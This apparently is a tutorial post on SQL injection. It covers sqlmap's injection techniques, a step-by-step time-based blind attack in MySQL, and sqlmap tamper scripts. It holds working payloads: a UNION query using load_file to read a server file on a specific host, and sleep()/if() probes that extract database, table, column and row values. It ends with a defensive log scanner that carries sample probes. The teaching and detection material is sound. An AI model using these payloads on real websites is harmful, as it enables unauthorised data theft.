Time-based SQLMap and Tamper script construction

SQLMap injection techniques:

  • Boolean-based blind: sqlmap replaces or appends an injected statement to the affected parameter in the HTTP request and infers the result from the response page. Alternatively, the user can provide a string or regular expression to match on True pages.
  • Time-based blind: for each HTTP response, by comparing its response time with that of the original request, the tool infers the output of the injected statement character by character.
  • Error-based: this technique works only when the web application has been configured to disclose back-end database management system error messages.
  • UNION query-based: appends a UNION ALL SELECT statement to the affected parameter; it works when the page prints every row of the query output (for example inside a for loop), as in:

http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php"),3-- 

  • Stacked queries: piggybacking. It appends to the affected parameter in the HTTP request a semi-colon (;) followed by the SQL statement to be executed.


Time-based blind injection:

How does time-based blind injection work?

The payloads use the following MySQL functions:

sleep(s) # pause for s seconds

mid(s,n,len) # return len characters of s, starting at the nth character

length(s) # return the length of s

if(expr,v1,v2) # if expr is true, return v1, otherwise return v2

substring(s,n,len) # same as mid(): return len characters of s, starting at the nth character (also written substr())

ascii(s) # return the ASCII code of the first character in s

limit # limit the number of rows returned
database() # return the current database name

0x00: Database

Guess the length of the database's name:

(if((length(database())=4),sleep(5),0)) 

If the length is 4, sleep 5 secs.

Guess the database's name:

If the first character is 'a', sleep 5 secs:

sleep(if((mid(database(),1,1)="a"),5,0))

sleep(if((ascii(substr(database(),1,1))=97),5,0))

0x01: Table

Guess the table name's length, then guess the name itself:

Guess the table name's length:

        (select sleep(if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6,5,0)))

Guess the table's name, one character at a time:
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='c'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='i'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)='t'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)='y'),5,0))) 


0x02: Column

Guess the column name (columns of the 'city' table are read from information_schema.COLUMNS):

Guess the column name's length:
 (select sleep(if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1)=2,5,0))) 

Guess the column name, one character at a time:
(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),1,1)='I'),5,0)))
(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),2,1)='D'),5,0)))


0x03: Value


Guess the value's length:
        (select sleep(if((select length(ID) from world.city limit 0,1)=1,5,0)))
Guess the value:
        (select sleep(if((mid((select ID from world.city limit 0,1),1,1)='1'),5,0))) 


Tamper scripts:

What are tamper scripts used for?

Sometimes a website only accepts data in a specific encoding.

For example:


So sqlmap needs to send its payloads in that specific form to do the injection.

We can use tamper scripts to encode the data first. sqlmap ships its own encoding scripts, called tamper scripts, located in '/usr/share/sqlmap/tamper' by default.

The command is:

sqlmap --tamper=base64encode

(base64encode.py is the name of the base64 tamper script in that folder.) For example, base64:


Constructing tamper scripts

But sometimes the default tamper folder doesn't have a specific encoding function, for example JSON. Here is a script I wrote, modelled on the base64 script.
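Detection-side counterpart to the probes above, as an added example that is not part of the original post or of sqlmap: it flags parameter values that carry a sleep() wrapped in if() (directly or under a base64 tamper layer, as in the tamper section) and marks whether the response was actually slow. The request list, the 3000 ms threshold and all sample values are constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Traits of the probes above: sleep() inside if() plus a character/schema lookup.
TRAITS = {
    "delay": re.compile(r"\bsleep\s*\(", re.I),  # add other DBMS delay functions as needed
    "conditional": re.compile(r"\bif\s*\(", re.I),
    "char_probe": re.compile(r"\b(mid|substr|substring|ascii|length)\s*\(", re.I),
    "schema_walk": re.compile(r"information_schema\.", re.I),
}

def decode_if_base64(value):
    """Strip a base64 tamper layer when the value round-trips cleanly as ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if base64.b64encode(raw).decode() == value else None

def traits_of(value):
    """Return (layer, traits): layer is 'plain', 'base64' or 'none', saying where the match was."""
    for layer, text in (("plain", value), ("base64", decode_if_base64(value))):
        if text is None:
            continue
        found = [name for name, rx in TRAITS.items() if rx.search(text)]
        if "delay" in found and "conditional" in found:
            return layer, found
    return "none", []

def scan_requests(requests, slow_ms=3000):
    """requests: (url, latency_ms) pairs. Flag params carrying a delay-in-conditional probe;
    delay_observed marks responses slower than slow_ms, i.e. the injected sleep likely ran."""
    alerts = []
    for url, latency_ms in requests:
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            layer, found = traits_of(value)
            if found:
                alerts.append({"param": name, "layer": layer, "traits": found,
                               "delay_observed": latency_ms >= slow_ms})
    return alerts

# Constructed sample: a normal request, the table-name probe above, and a similar probe
# sent through a base64 tamper layer; values are URL-encoded as they would appear in a log.
PLAIN_PROBE = "1%20and%20(select%20sleep(if((mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)=%27c%27),5,0)))"
B64_PROBE = quote(base64.b64encode(b"1 and sleep(if((mid(database(),1,1)='a'),5,0))").decode(), safe="")
SAMPLE_REQUESTS = [("/portfolio.php?id=4", 38), ("/portfolio.php?id=" + PLAIN_PROBE, 5041),
                   ("/portfolio.php?id=" + B64_PROBE, 5039)]
```

Feed scan_requests() the URL and latency of each request from your access log; a "delay_observed" alert is a probe that the database actually executed, not just an attempt.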





